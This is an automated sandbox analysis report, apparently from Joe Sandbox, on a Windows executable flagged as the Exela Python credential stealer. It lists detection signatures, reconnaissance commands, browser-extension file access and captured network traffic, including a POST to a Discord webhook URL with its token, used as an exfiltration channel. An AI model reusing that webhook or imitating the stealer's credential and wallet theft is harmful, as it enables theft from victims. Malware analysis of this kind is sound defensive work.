Windows Analysis Report
SecuriteInfo.com.FileRepMalware.22561.28030.exe

Overview

General Information

Sample name: SecuriteInfo.com.FileRepMalware.22561.28030.exe
Analysis ID: 1543665
MD5: aecb2c382b2181620aa3243dcbca51c8
SHA1: 9b103aa29dd1f39b7bb6261703f144bfdfa4a06e
SHA256: 6b9568f25dba66dde3d01baa88ff15ce5165fed7c29c8446d8fab993234a49ce
Tags: exe
Infos:

Detection

Python Stealer, Exela Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Exela Stealer
Yara detected Python Stealer
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

AV Detection

barindex
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe Avira: detected
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Avira: detection malicious, Label: HEUR/AGEN.1306040
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe ReversingLabs: Detection: 50%
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe ReversingLabs: Detection: 50%

Phishing

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net user administrator
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
Source: Binary string: C:\A\34\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458402101.00007FFDA3AE1000.00000040.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\select.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460538535.00007FFDA5491000.00000040.00000001.01000000.0000000A.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdbMM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_bz2.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459049746.00007FFDA4161000.00000040.00000001.01000000.0000000B.sdmp
Source: Binary string: cryptography_rust.pdbc source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SecuriteInfo.com.FileRepMalware.22561.28030.exe
Source: Binary string: C:\A\34\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457498631.00007FFDA3561000.00000040.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_hashlib.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2456611424.00007FFDA32F1000.00000040.00000001.01000000.00000015.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdb source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: crypto\bn\bn_ctx.cBN_CTX_startBN_CTX_getossl_ec_group_new_excrypto\ec\ec_lib.cEC_GROUP_copyEC_GROUP_set_generatorEC_GROUP_set_curveEC_GROUP_get_curveEC_GROUP_get_degreeEC_GROUP_check_discriminantEC_POINT_newEC_POINT_copyEC_POINT_set_to_infinityEC_POINT_set_Jprojective_coordinates_GFpEC_POINT_set_affine_coordinatesEC_POINT_get_affine_coordinatesEC_POINT_addEC_POINT_dblEC_POINT_invertEC_POINT_is_at_infinityEC_POINT_is_on_curveEC_POINT_cmpEC_POINT_mulEC_GROUP_get_trinomial_basisEC_GROUP_get_pentanomial_basisgroup_new_from_nameossl_ec_group_set_paramsencodingdecoded-from-explicitEC_GROUP_new_from_paramsgeneratorcrypto\evp\digest.cevp_md_ctx_new_exevp_md_ctx_free_algctxevp_md_init_internalEVP_DigestUpdatesizeEVP_DigestFinal_exassertion failed: mdsize <= EVP_MAX_MD_SIZEEVP_DigestFinalXOFxoflenEVP_MD_CTX_copy_exEVP_MD_CTX_ctrlmicalgssl3-msblocksizexofalgid-absentevp_md_from_algorithmupdatecrypto\evp\m_sigver.cUNDEFdo_sigver_initEVP_DigestSignUpdateEVP_DigestVerifyUpdateEVP_DigestSignFinalEVP_DigestSignEVP_DigestVerifyFinalEVP_DigestVerifycompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.3.2built on: Fri Oct 18 00:15:00 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: ossl_ec_GFp_simple_group_set_curvecrypto\ec\ecp_smpl.cossl_ec_GFp_simple_group_check_discriminantossl_ec_GFp_simple_point_set_affine_coordinatesossl_ec_GFp_simple_point_get_affine_coordinatesossl_ec_GFp_simple_make_affineossl_ec_GFp_simple_points_make_affineossl_ec_GFp_simple_field_invossl_ec_GFp_simple_blind_coordinatescrypto\user\tb_digest.cuser_get_digestcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_socket.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459264735.00007FFDA4331000.00000040.00000001.01000000.00000009.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_ctypes.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458028141.00007FFDA3711000.00000040.00000001.01000000.00000007.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_lzma.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457809177.00007FFDA36FB000.00000040.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_asyncio.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458199558.00007FFDA3A81000.00000040.00000001.01000000.00000012.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\python3.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2440853445.0000018B46A80000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-1_1"not available source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: d:\a01\_work\4\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119754812.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2460318251.00007FFDA5471000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457310056.00007FFDA3531000.00000040.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_overlapped.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459813174.00007FFDA4DA1000.00000040.00000001.01000000.00000013.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\python310.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2454057077.00007FFD943CE000.00000040.00000001.01000000.00000004.sdmp
Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2457000685.00007FFDA3435000.00000040.00000001.01000000.00000011.sdmp
Source: Binary string: :C:\Users\user\AppData\Local\Temp\rgrzc2jl\rgrzc2jl.pdbhP source: powershell.exe, 00000051.00000002.2305154049.00000260C2523000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2458841393.00007FFDA3FD1000.00000040.00000001.01000000.00000023.sdmp
Source: Binary string: cryptography_rust.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2447890172.00007FFD93461000.00000040.00000001.01000000.0000001F.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\_uuid.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2459552942.00007FFDA4631000.00000040.00000001.01000000.0000001D.sdmp
Source: Binary string: C:\A\34\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2448990282.00007FFD93CFB000.00000040.00000001.01000000.00000017.sdmp
Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmp

Spreading

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 0_2_00007FF7B2B683C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B69280 FindFirstFileExW,FindClose, 0_2_00007FF7B2B69280
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 0_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7B2B81874
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B69280 FindFirstFileExW,FindClose, 2_2_00007FF7B2B69280
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 2_2_00007FF7B2B683C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FF7B2B81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose, 2_2_00007FF7B2B81874
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe Code function: 2_2_00007FFD93D13229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFDB222F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte, 2_2_00007FFD93D13229
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg Jump to behavior

Networking

barindex
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\NETSTAT.EXE netstat -ano
Source: Joe Sandbox View IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View IP Address: 162.159.136.232 162.159.136.232
Source: unknown DNS query: name: ip-api.com
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.10
Source: global traffic HTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.10
Source: global traffic DNS traffic detected: DNS query: ip-api.com
Source: global traffic DNS traffic detected: DNS query: discord.com
Source: global traffic DNS traffic detected: DNS query: api.gofile.io
Source: global traffic DNS traffic detected: DNS query: store1.gofile.io
Source: global traffic DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa
Source: unknown HTTP traffic detected: POST /api/webhooks/1298294465534099557/tV90pThPVvQpjF3HTJU-fplHLi0RLPFiHy4H6WFkFos5MS3hw3K64VoD-wO_IKZJNJCs HTTP/1.1Host: discord.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.10.10Content-Length: 1379
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Mon, 28 Oct 2024 07:20:36 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86730000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124244235.000002BD86724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125264112.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125808279.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120382829.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119928471.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120773656.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2119865961.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120482711.000002BD8672C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2126005023.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120319305.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120619487.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2123951938.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124343863.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125684536.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2124729226.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120921532.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2125084062.000002BD86724000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120702838.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120555468.000002BD86720000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.22561.28030.exe, 00000000.00000003.2120845442.000002BD86720000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
